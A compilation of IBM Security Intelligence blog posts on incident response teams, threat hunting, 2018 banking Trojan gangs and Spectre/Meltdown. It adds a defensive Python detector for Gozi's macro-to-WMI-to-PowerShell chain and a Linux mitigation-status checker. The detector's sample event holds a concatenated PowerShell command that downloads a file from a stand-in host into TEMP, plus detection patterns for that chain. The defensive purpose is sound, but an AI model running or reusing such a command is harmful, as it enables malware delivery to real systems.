
5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less on an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables to help beyond the postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IT Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get back to what matters most: their core business.


The post 5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line appeared first on Security Intelligence.

Author: Ahmed Saleh


Hunting for the True Meaning of Threat Hunting at RSAC 2019

After my first-ever RSA Conference experience, I returned to Boston with a lot of takeaways — not to mention a week’s worth of new socks, thanks to generous vendors that had a more functional swag approach than most. I spent the majority of my time at RSAC 2019 at the Master Threat Hunting kiosk within the broader IBM Security booth, where I told anyone who wanted to listen about how we use methodologies and tools from the military and intelligence communities to fight cyberthreats in the private sector. When I wasn’t at the booth, I was scouring the show floor on a hunt of my own — a hunt for the true meaning of threat hunting.

Don’t Believe the Hype: 3 Common Misconceptions About Threat Hunting

At first glance, the results of my hunt seemed promising; I saw the term “threat hunting” plastered all over many of the vendors’ booths. Wanting to learn more, I spoke with the booth personnel about their threat hunting solutions, gathered a stack of marketing one-pagers and continued on my separate hunt for free socks and stress balls.

After digesting the information from booth staff and digging into the marketing materials from the myriad vendors, I was saddened to learn that threat hunting is becoming a full-blown buzzword.

Let’s be honest: “Threat hunting” certainly has a cool ring to it that draws people in and makes them want to learn more. However, it’s important not to lose sight of the fact that threat hunting is an actual approach to cyber investigations that has been around since long before marketers started using it as a hook.

Below are three of the most notable misconceptions about threat hunting I witnessed as I prowled around the show floor at RSAC 2019.

1. Threat Hunting Should Be Fully Automated

In general, automation is great; I love automating parts of my life to save time and to make things easier. However, there are some things that can’t be fully automated — or shouldn’t be, at least not yet. Threat hunting is one of those things.

While automation can be used within various threat hunting tools, it is still a very manual, human-led process to proactively (and reactively) hunt for unknown threats in your network that may have avoided your rules-based detection solutions. Threat hunting methodologies were derived from the counterterrorism community and repurposed for cybersecurity. There’s a reason why we don’t fully automate counterterrorism analysis, and the same applies to cyber.

2. Threat Hunting and EDR Are One and the Same

This was the most common misconception I encountered while searching for threat hunting solutions at RSAC. It went something like this: I would go into a booth, ask to learn more about the vendor’s threat hunting solution and come to find that what’s actually being marketed is an endpoint detection and response (EDR) solution.

EDR is a crucial piece of threat hunting, but these products are not the only tools threat hunters use. If threat hunting was as easy as using an EDR solution to find threats, we would have a much higher success rate. The truth is that EDR solutions need to be coupled with other tools, such as threat intelligence, open-source intelligence (OSINT) and network data, and brought together in a common platform to visualize anomalies and trends in the data.

3. Threat Hunting Is Overly Complicated

All of the marketing and buzz around threat hunting has overcomplicated what it actually is. It’s not one tool, it’s not automated, it’s not an overly complicated process. It takes multiple tools and a ton of data, it is very much dependent on well-trained analysts that know what they’re looking for, and it is an investigative process just like counterterrorism and law enforcement investigations. Since cyber threat hunting mirrors these investigative techniques, threat hunters should look toward trusted tools from the national security and law enforcement sectors.

What Is the True Meaning of Cyber Threat Hunting?

Don’t get me wrong — I am thrilled that threat hunting is gaining steam and vendors are coming up with innovative solutions to contribute to the definition of threat hunting. As a former analyst, I define threat hunting as an in-depth, human-led, investigative process to discover threats to an organization. My definition may vary from most when it comes to how this is conducted, since most definitions emphasize that threat hunting is a totally proactive approach. While I absolutely agree with the importance of proactivity, there aren’t many organizations that can take a solely proactive approach to threat hunting due to constraints related to budget, training and time.

While not ideal, there is a way to hunt reactively, which is often more realistic for small and midsize organizations. For example, you could conduct a more in-depth cyber investigation to get the context around a cyber incident or alert. Some would argue that’s just incident response, not threat hunting — but it turns into threat hunting when an analyst takes an all-source intelligence approach to enrich their investigation with external sources, such as threat intelligence and social media, and other internal sources of data. This approach can show the who, what, where, when and how around the incident and inform leadership on how to take the best action. The context can be used to retrain the rules-based systems and build investigative baselines for future analysis.

The Definition of Threat Hunting Is Evolving

Cyber threat hunting tools come in all shapes and sizes, but the most advanced tools allow you to reactively and proactively investigate threats by bringing all your internal and external data into one platform. By fusing internal security information and event management (SIEM) data, internal records, access logs and more with external data feeds, cyber threat hunters can identify trends and anomalies in the data and turn it into actionable intelligence to address threats in the network and proactively thwart ones that haven’t hit yet.

Behind the buzz and momentum from RSAC 2019, threat hunting will continue to gain traction, more advanced solutions will be developed, and organizations will be able to hunt down threats more efficiently and effectively. I’m excited to see how the definition evolves in the near future — as long as the cyber threat hunting roots stay strong.


The post Hunting for the True Meaning of Threat Hunting at RSAC 2019 appeared first on Security Intelligence.

Author: Jake Munroe


The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018

Banking Trojans and the gangs that operate them continue to plague banks, individuals and organizations with fraudulent transactions facilitated by malware and social engineering schemes. At last check, cybercrime cost the global economy more than $600 billion in 2017, and forecasts for 2018 predicted $1.5 trillion in losses.

No matter how you turn these numbers, they are a burden that keeps growing and encouraging a rife, complex industry of online crime.

Going Behind the Numbers of the ‘IBM X-Force Threat Intelligence Index’

Every year, increasingly organized cybercrime gangs shuffle their tactics, techniques and procedures (TTPs) to evade security controls on the micro level and law enforcement on the macro level. Behind each malware named on the top 10 chart below, codes are distributed and operated differently and focus on different parts of the globe. The chart is populated by organized cybercrime gangs that have ties to yet other cybercrime gangs, each doing its part to feed the perpetual supply chain of a digital financial crime economy.

In cybercrime, it can be said that the more things change, the more things stay the same. In 2018, however, I must admit I was finally surprised when two malware gangs that did not appear connected at first began openly collaborating. It thus became clearer than ever that the banking Trojan arena is dominated by groups from the same part of the world, by people who know each other and collaborate to orchestrate high-volume wire fraud.

To learn more about the malware that shaped 2018, let’s begin by looking at the top constituents of the gang-owned Trojan chart and drill down on information gathered by IBM Security for the top three.


Figure 1: Top 10 chart of the most active banking Trojan families in 2018 (source: IBM X-Force)

1. TrickBot

TrickBot, a banking Trojan operated by a Russia-based threat group, was one of the most aggressive Trojans of 2018. It targets banks across the globe with URL-heavy configurations that often include a large number of targeted bank brands from across the globe.

TrickBot’s operators focus on business banking and high-value accounts that are held with private banking and wealth management firms, but they also diversified in 2018 to include various e-commerce and cryptocurrency exchange platforms on their target lists.

According to IBM X-Force data that was gathered since TrickBot’s rise, no other financial Trojan is as consistently active in terms of infection campaigns and deployment of redirection attacks, indicating that its operators have ample resources and connections to develop and operate the malware in different parts of the world. Despite this overall capability, X-Force saw TrickBot sharpening its focus in 2018 and targeting a handful of countries in each campaign, keeping major economies such as the U.K. and the U.S. on almost every target list.

Intergang Collaboration With IcedID

Some of the trends in TrickBot’s activity in 2018 included collaboration with another banking Trojan, IcedID, which IBM X-Force discovered in September 2017, as well as operating the Ryuk ransomware, a subset of TrickBot’s botnet monetization strategy. These highlight a larger trend of intergang collaboration among Trojan operators striving to generate larger profits in spite of growing security control sophistication.

At first, TrickBot and IcedID appeared unrelated. But about eight months into IcedID’s existence, signs of a link between the two became apparent. In May 2018, X-Force researchers observed TrickBot dropping IcedID, whereas it had previously been dropped primarily by the Emotet Trojan, the same distributor that also drops TrickBot in different campaigns.

By August 2018, our researchers noted that IcedID had been upgraded to behave in a similar way to the TrickBot Trojan in terms of its deployment. The binary file was modified to become smaller and no longer featured embedded modules. The malware’s plugins were being fetched and loaded on demand after the Trojan was installed on infected devices. These changes made IcedID stealthier, modular and more similar to TrickBot.

In addition to its increased stealth level, IcedID also started encrypting its binary file content by obfuscating file names associated with its deployment on the endpoint. Also similar to TrickBot are IcedID’s event objects, which coordinate multiple threads of execution in Windows-based operating systems. IcedID began using named events to synchronize the execution between its core binary and the plugins selected for loading. When a plugin was called upon, it was fetched by its ID number from the attacker’s server and, when loaded, assigned a unique ID.

Although malware authors do sometimes copy from one another, our research indicates these modifications were not coincidental. Even if we only looked at the fact that TrickBot and IcedID fetch one another into infected devices, that would be indication enough that these Trojans are operated by teams that work together.

Longtime Partners?

Ties between TrickBot and IcedID may have started years ago in a collaboration designed to help both groups maximize their illicit operations and profits. During the six-year activity phase of the Neverquest (aka Catch or Vawtrak) Trojan, it collaborated with the Dyre group to deliver Dyre malware to devices already infected with Neverquest.

The original Dyre group partly disbanded in late 2015, followed by the rise of TrickBot, which is believed to be the successor to Dyre. Neverquest halted operations following the arrest of one of its key members in 2016, after which the IcedID Trojan appeared. With the two featuring advanced capabilities and evident cybercrime connections with other gangs, their current-day collaboration likely started years ago.

The TrickBot-Ryuk Connection

Another TrickBot trend that started in 2018 is a connection with ransomware. Reminiscent of the Dridex Trojan’s links to the Locky and then BitPaymer ransomware, TrickBot began dropping ransomware called Ryuk. Unlike wide-cast nets that spread ransomware to as many email recipients as possible, Ryuk, like BitPaymer, is spread in targeted campaigns where attackers go through the typical advanced persistent threat (APT) kill chain and manually breach the network.

Ryuk attackers often go through reconnaissance stages, looking for valuable data to hijack. The goal: Infect established organizations with Ryuk and then demand large sums in ransom payments that average hundreds of thousands of dollars each.


Figure 2: Ryuk campaigns — a four-step routine to drop three different Trojans to target devices (source: IBM X-Force)

Upon investigating Ryuk’s code, it quickly became apparent that this ransomware was not entirely new. Ryuk closely resembles the Hermes ransomware that was linked with malicious activity by a nation-state-sponsored group called Lazarus (aka Hidden Cobra).

Is Ryuk connected to Hermes? That’s one possibility. It could also be that some Lazarus members collaborate with banking Trojan operators through cross-border partnerships to steal and launder large amounts of cybercrime money via Eastern Europe and Asia, or that someone with access to the Hermes code reused it to create Ryuk.

Whatever the source of Ryuk, it shows that TrickBot’s operators are diversifying their nefarious activity, continuing to focus heavily on the business sector and launching targeted attacks that press organizations to pay.


Figure 3: Collaboration between major malware gangs (source: IBM X-Force)

TrickBot TTPs and Evolution

In terms of its TTPs, TrickBot’s operators focus their efforts on businesses and, therefore, opt for distribution through booby-trapped productivity files and fake bank websites. After infection, TrickBot modules allow it to spread laterally in compromised networks and infect additional users.

TrickBot continues to use both server-side injections deployed on the fly from its attack server and redirection attacks hosted on its servers to hijack users and present them with a fake replica of their bank’s website.

In 2018, TrickBot’s developers added three new functions to the malware, facilitating the theft of Remote Desktop Protocol (RDP) credentials, Virtual Network Computing (VNC) credentials and PuTTY open-source terminal emulator credentials. It steals Windows system reliability and performance data and features a new mechanism for storing its configuration and elliptic curve cryptography (ECC) public keys.

The TrickBot botnet is supported by what’s considered a mature infrastructure, where some campaigns featured 2,458 unique command-and-control (C&C) IP addresses used in 493 main configuration releases across 276 versions — all in one week.

X-Force expects to see TrickBot maintain its position on the global malware chart unless it is interrupted by law enforcement in 2019.

2. Gozi

Gozi (aka Ursnif) has been highly active in the wild for more than a decade now, a rare occurrence in the cybercrime arena. The malware was first discovered in 2007, when it was operated by a closed group of developers and cybercriminals. At the time, it was used to target online banking users mostly in English-speaking countries.

Throughout the years, Gozi has gone through almost every phase a banking Trojan can go through. Its code was leaked in 2010, giving rise to other Trojans, such as Neverquest, that also dominated the cybercrime charts for years after. It was used in the Gozi-Prinimalka ordeal in 2012 and, in 2013, was fitted with a master boot record (MBR) rootkit to create high persistence through a computer’s MBR.

In 2016, X-Force reported about the rise of the GozNym hybrid, a two-headed beast spawned from the Nymaim malware and embedded with the Gozi financial fraud module. Starting in 2017, X-Force researchers reported that a new variation of Gozi was being tested in Australia: Gozi v3. The malware was based on the same code of the original Gozi ISFB but featured some modifications on the code injection level and attack tactics.

In 2018, Gozi v2 was the second-most active Trojan in the wild, working across the globe and in Japan. V2 is operated separately from the v3 version that continues to target banks in the Australia-New Zealand region. The malware is operated in a cybercrime-as-a-service model that allows different cybercriminals to use the botnet to conduct fraud.

To reach new victims, Gozi is distributed in document and spreadsheet attachments that prompt the user to enable macros. In recent campaigns, when the user complies, the macro runs the WMI Provider Host process (wmiprvse) to execute a malicious PowerShell script. The script is designed to fetch the payload and uses string concatenation to evade detection.
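Detection logic for the delivery chain just described, as an added example (not code from the IBM X-Force report): because the macro goes through WMI, the PowerShell downloader's parent process is wmiprvse.exe rather than the Office application, and its command line is pieced together from concatenated string fragments. The events below are constructed Sysmon-style process-creation records; the field names, sample paths and the example.invalid URL are assumptions.

```python
"""Flag PowerShell launched by WMI Provider Host, PowerShell launched directly
by an Office application, and command lines assembled from concatenated
string fragments. Events are constructed Sysmon-style process-creation
records (assumed fields: ParentImage, Image, CommandLine)."""
import re
from dataclasses import dataclass

WMI_HOST = "wmiprvse.exe"
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# A short quoted fragment immediately followed by '+': the shape of a
# string that has been split into pieces to defeat keyword matching.
CONCAT_RE = re.compile(r"""['"][^'"]{1,12}['"]\s*\+\s*""")


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    concat_fragments: int
    event: ProcessEvent


def basename(path):
    """Case-insensitive file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def concat_fragment_count(command_line):
    """Number of quoted fragments joined with '+' in a command line."""
    return len(CONCAT_RE.findall(command_line))


def evaluate(event, concat_threshold=4):
    """Return every rule a single process-creation event matches."""
    if basename(event.image) not in POWERSHELL:
        return []
    parent = basename(event.parent_image)
    frags = concat_fragment_count(event.command_line)
    findings = []
    if parent == WMI_HOST:
        # The WMI hop breaks the Office -> PowerShell parent link; this is
        # the relationship the Gozi macro chain leaves behind.
        findings.append(Finding("wmiprvse_spawns_powershell", frags, event))
    elif parent in OFFICE_HOSTS:
        findings.append(Finding("office_spawns_powershell", frags, event))
    if frags >= concat_threshold:
        findings.append(Finding("concatenated_powershell_payload", frags, event))
    return findings


def scan(events):
    """Evaluate a stream of events and return all findings in order."""
    return [f for ev in events for f in evaluate(ev)]


# Constructed sample events; the URL and paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(  # Gozi-style chain: WMI host parent, concatenated URL
        r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -w hidden -c \"$u=('ht'+'tp'+'://'+'pay'+'load'"
        "+'.example.invalid/a');Invoke-WebRequest $u -OutFile $env:TEMP\\a.bin\"",
    ),
    ProcessEvent(  # routine scheduled script: no finding expected
        r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    ),
    ProcessEvent(  # direct Office-to-PowerShell spawn, no concatenation
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -c Get-Date",
    ),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:32} fragments={f.concat_fragments} "
              f"parent={basename(f.event.parent_image)}")
```

The concatenation threshold is a tuning knob: legitimate scripts rarely join more than a couple of short literals on one command line, so start high and lower it once you know your baseline.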

Recently, in the case of attack schemes against banks in Europe, Gozi delivered custom-tailored client-side code for each targeted bank brand users accessed, likening its tactics to redirection attacks in which each brand is targeted in a specific way.

Gozi’s distributors use malicious websites to host their resources but check the target device’s Geo IP to reduce the potential of exposure. If either Russian or Chinese keyboard settings are detected during its installation, the deployment ends.

This malware has been part of the top-most constituents of the global malware chart for the past five years, and X-Force expects to see this longtime staple of the organized cybercrime arena maintain its position on the chart in 2019.

3. Ramnit

Ramnit is a prolific banking Trojan that has been active in the wild since 2010. Ramnit started out as a self-replicating worm, leveraging removable drives and network shares to spread to new endpoints. As the project evolved, Ramnit morphed into a modular banking Trojan and started spreading via popular exploit kits such as Angler and RIG.

Although it was one of the most prominent Trojans between 2011 and 2014, Ramnit was targeted by law enforcement in 2015. While it was one of the only botnets to ever survive a coordinated disruption, its operators have not returned to the same level of activity since. In recent years, Ramnit has been an on-again-off-again operation, seeing long lulls in its cybercrime activity and narrowing its attack turf over time to focus mostly on the U.K., Canada and Japan.

2018: Reemergence and Intergang Collaboration

In 2018, the Ramnit Trojan returned to the cybercrime arena with revamped code and a new partner, a proxy malware known as Ngioweb. Ramnit’s developer modified its financial module to enhance its capabilities and changed the internal module’s name from “Demetra” to “Camellia.”

Ramnit’s 2018 comeback resulted in a reported infection of more than 100,000 devices within the span of two months, as part of an operation code-named “Black.” In this campaign, Ramnit went back to its worm roots and was used as a first-stage infection in a kill chain designed to amass a large proxy botnet for Ngioweb.

How good was this new partnership for Ramnit? We can only assume that it was used to create a massive proxy botnet that would resemble the Gameover Zeus botnet in its architecture. The Black campaign was short-lived, and by the end of 2018, Ramnit was linked with Emotet, Dridex and BitPaymer for using the same dropper as those Trojans and being used itself as a dropper for Dridex.

TTPs

Configuration and code comments show that Ramnit is probably being developed by new team members. Configuration injects were rewritten in the Lua programming language and, in many cases, were buggy or unsophisticated. This was not the case for this malware in past years.

For its deployment routine, Ramnit began leveraging code that relies on PowerShell scripts in what’s known as reflective PE injection. Its modules are not pulled from a remote server but come packed with the core malware, and its reliance on a domain generation algorithm (DGA) has been modified to include hardcoded domains.

Will we continue to see Ramnit in 2019? X-Force researchers expect to see the same activity pattern for this malware with its come-and-go nature in Japan and Europe. Ramnit will likely drop from its current rank on the global Trojan chart and be overtaken by IcedID and newcomers like BackSwap and DanaBot.

Threat Landscape Staples

Banking Trojans have been a burdensome part of the cybercrime threat landscape for more than a decade now. The past five years have shown us that this breed of attackers is only becoming more sophisticated over time, incorporating technical knowledge with advanced social engineering to focus schemes on victims that can yield the biggest profits: businesses, cryptocurrency and high-value individuals.

While previous years saw gangs operate as adversaries, occupy different turfs and even attack each other’s malware, our research from 2018 connected the major cybercrime gangs together in explicit collaboration. This trend is a negative sign that highlights how botnet operators join forces, revealing the resilience factor in these nefarious operations.

While it can be hard to detect this type of evolving malware, it’s possible to stop banking Trojans before they make it into your device or your organization. Proper security controls and user education, as well as planned incident response, can help keep this threat at bay and contain its detrimental effects if ever an account is taken over and robbed by highly experienced criminals.

To learn more about the top security threats of 2018 and what 2019 may have in store, download the “IBM X-Force Threat Intelligence Index.” Check out page 30 in the report for our expert team’s tips on mitigating threats and increasing preparedness for a possible breach.


The post The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018 appeared first on Security Intelligence.

Author: Limor Kessem


Spectre, Meltdown and More: What You Need to Know About Hardware Vulnerabilities

The “2019 IBM X-Force Threat Intelligence Index” highlighted a paradigm shift sparked by a new era of hardware security challenges. The exposure of critical hardware vulnerabilities that affected almost every endpoint built in the past 20 years forced enterprises and the security community to rethink the way they approach hardware security and its impact on the business.

Since the release of the Spectre/Meltdown vulnerabilities in January 2018, researchers have been uncovering new potential impacts while threat actors search for ways to exploit these significant hardware vulnerabilities and launch attacks on affected systems. The benefits of determining valid attack vectors are significant, since many organizations have struggled to effectively address Spectre and Meltdown.

Based on interest displayed in dark web forums and underground marketplaces, IBM X-Force Incident Response and Intelligence Services (IRIS) assessed that threat actors will continue to search for ways to leverage Spectre, Meltdown and other hardware vulnerabilities to steal data in the coming years. Security teams must continue to monitor this space for new research and vendor patches to minimize detrimental effects to their business.

The Paradigm Shift Catalyst: Spectre and Meltdown

In January 2018, researchers debuted three variants of critical hardware vulnerabilities affecting most popular processor chips released since the 1990s, naming them Spectre and Meltdown (two of the three variants were lumped under the name “Spectre,” and the remaining variant was called “Meltdown”).

Spectre and Meltdown leverage “speculative execution” to gain access to sensitive data that would otherwise reside in a device’s protected memory. Modern processor chips not only process the commands programs give them, but also attempt to preemptively process possible outcomes. By preprocessing possible decision paths, processors are able to send back solutions more quickly and thereby increase processing speeds significantly. Once a decision path is chosen, the processor usually ignores any other preemptively processed possibility. This discarded path is the key to speculative execution. Spectre and Meltdown leverage this discarded path to gain access to data that should otherwise be protected by security controls. Meltdown allows an attacker to gain access to “protected data” from anywhere on a machine — “melting” security boundaries, if you will — whereas Spectre is limited to revealing protected data from the same program.

This sounds a lot like a standard privilege escalation bug, so why are these vulnerabilities such a big deal? Securely coded applications rely on a number of assumptions, one of which is that protected data remains separate from other data. As a result, securely coded applications suddenly found themselves insecure because the rules had changed.

On top of this issue, patching Spectre and Meltdown initially proved to be difficult because early patches led to possible system failure on Windows machines. Finally, Spectre/Meltdown weren’t easily detected by static security controls or basic patching scans since the issue was below the operating system level, making the attempted exploitation of these vulnerabilities tough to observe. These elements combined made Spectre/Meltdown worrisome threats to reckon with upon release to the public.

Dark Web Research Reveals Continued Threat Actor Interest

Since information about these vulnerabilities was initially released, researchers have been working to discover new, similar ones. In November 2018, researchers from a number of universities published seven new Spectre/Meltdown variants using slightly altered parameters and techniques. Multiple other researchers have vowed to keep investigating other variants to take advantage of the same underlying flaws. In 2019, IBM research released two more variants of these flaws.

While researchers have been looking for new ways to exploit Spectre, Meltdown and similar vulnerabilities for the purpose of understanding them better and devising protection mechanisms, threat actors have been watching the advancements with bated breath, knowing that many users and even organizations delay patching or applying workarounds to production environments. Meanwhile, since January 2018, IBM X-Force has observed a large number of posts across criminal underground venues inquiring about Spectre/Meltdown and seeking additional information on how to determine whether a system is vulnerable as well as active ways to exploit these vulnerabilities.

Why Aren’t We Seeing Active Exploitation at Scale?

Given the clear threat actor interest in Spectre, Meltdown and similar hardware vulnerabilities, you might ask why we did not see more malicious activity attempting to exploit them in the past year. There are numerous possible explanations, some of which are listed below.

  • Most threat actors may not know how to leverage Spectre/Meltdown. These vulnerabilities are highly technical, requiring a threat actor to have a deep understanding of hardware processing to effectively leverage them.
  • Threat actors may not be motivated to create exploit code if they don’t already have a way to monetize the vulnerabilities. Spectre/Meltdown can be challenging to use in targeting specific data and often return a very limited subset of data from the flawed device. This data could be useful, but it is often too specific and wouldn’t provide a threat actor with something they could turn around and sell quickly. If there is little opportunity to make a fast profit, most financially motivated actors will choose to invest their time and research into weaponizing other vulnerabilities.
  • Threat actors have figured out how to use Spectre and Meltdown but are finding too many already-patched systems. Given the high-profile nature of the Spectre/Meltdown release, many organizations may have already fixed the flaws, which can deter threat actors from investing too heavily into leveraging these vulnerabilities in environments they would consider lucrative enough to begin with.
  • Threat actors could be leveraging Spectre/Meltdown, but current sensors are not observing the attempts. This collection gap might occur due to limitations on endpoint sensors that only look at threats at the operating system level and above, while these vulnerabilities occur at the hardware level.

In all likelihood, all of the above answers are, to some extent, correct. However, the first two are likely only temporary roadblocks. Given enough time, more threat actors are likely to figure out how to weaponize Spectre/Meltdown and, eventually, monetize their output effectively. Once a few actors figure it out, it might only take one leak of working exploit code or a Spectre/Meltdown-leveraging tool in underground forums to open up these vulnerabilities for actors of any sophistication level to use.

Keys to Mitigation: Patching and Threat Intelligence

Hardware vulnerabilities are an issue that the security industry is only starting to see at scale, and we are only likely to encounter more of these in the future. Since these types of flaws can affect an extremely large population of devices on a global scale, it is all the more important to keep an eye on them, prioritize them properly and patch promptly.

When Spectre/Meltdown were reported, vendors released a series of patches to mitigate potential impacts. However, patch fixes are still a work in progress, with some patches potentially reducing performance on Linux-based systems by double-digit percentages. Despite these issues, patching systems containing critical or highly sensitive data is still the best available solution until processor manufacturers issue hardware-level fixes.

Organizations should be sure to back up critical data prior to patch installation, ask vendors for best practices in patch application, test the patch first and be prepared to revert to prior builds if patches lead to unsustainable performance reduction.
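Verifying that a patch actually took effect is part of the testing step above. As an added example (not part of the article and not IBM tooling), the following Python script reads the Linux kernel's per-flaw status files under /sys/devices/system/cpu/vulnerabilities (present on kernels since 4.15) and reports which entries are still vulnerable or of unknown state. The status-string prefixes (Not affected, Vulnerable, Mitigation:, Unknown:) are the kernel's real conventions; the sample statuses embedded in the block are constructed so the script can be run and checked on any host.

```python
"""Added example (not from the article): summarize the Linux kernel's reported
mitigation status for speculative-execution flaws such as Spectre and Meltdown."""
from pathlib import Path
from typing import Dict, List

# Real sysfs location (Linux 4.15 and later); one file per known flaw.
VULN_DIR = Path("/sys/devices/system/cpu/vulnerabilities")


def classify(status: str) -> str:
    """Map a kernel status string to a coarse category.

    The kernel writes one of: "Not affected", "Vulnerable[: detail]",
    "Mitigation: <technique>" or "Unknown[: detail]".
    """
    s = status.strip()
    if s == "Not affected":
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def summarize(entries: Dict[str, str]) -> Dict[str, str]:
    """Classify every flaw-name -> status pair."""
    return {name: classify(status) for name, status in entries.items()}


def needs_attention(summary: Dict[str, str]) -> List[str]:
    """Flaws whose state is vulnerable or unknown, sorted for stable reporting."""
    return sorted(name for name, cat in summary.items()
                  if cat in ("vulnerable", "unknown"))


def read_sysfs(directory: Path = VULN_DIR) -> Dict[str, str]:
    """Read live statuses; returns an empty dict on non-Linux hosts or old kernels."""
    if not directory.is_dir():
        return {}
    return {p.name: p.read_text().strip()
            for p in sorted(directory.iterdir()) if p.is_file()}


# Constructed sample resembling what a partially patched host might report.
SAMPLE_STATUS = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: usercopy/swapgs barriers and __user pointer sanitization",
    "spectre_v2": "Vulnerable: Retpoline without IBPB",  # constructed: partial mitigation only
    "spec_store_bypass": "Unknown: No mitigations",      # constructed: kernel cannot tell
    "l1tf": "Not affected",
}


def report(entries: Dict[str, str]) -> List[str]:
    """One line per flaw plus a closing line listing what still needs work."""
    summary = summarize(entries)
    lines = [f"{name:20} {cat:13} {entries[name]}"
             for name, cat in sorted(summary.items())]
    pending = needs_attention(summary)
    lines.append("attention needed: " + (", ".join(pending) if pending else "none"))
    return lines


if __name__ == "__main__":
    # Use the live sysfs data when available, otherwise the constructed sample.
    live = read_sysfs()
    print("\n".join(report(live if live else SAMPLE_STATUS)))
```

Run it on each host after patching and before the rollback window closes; an "Unknown" entry on a virtual machine often means the hypervisor has not exposed the relevant CPU features to the guest, which is a question for the platform team rather than a reason to keep rebooting the guest.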

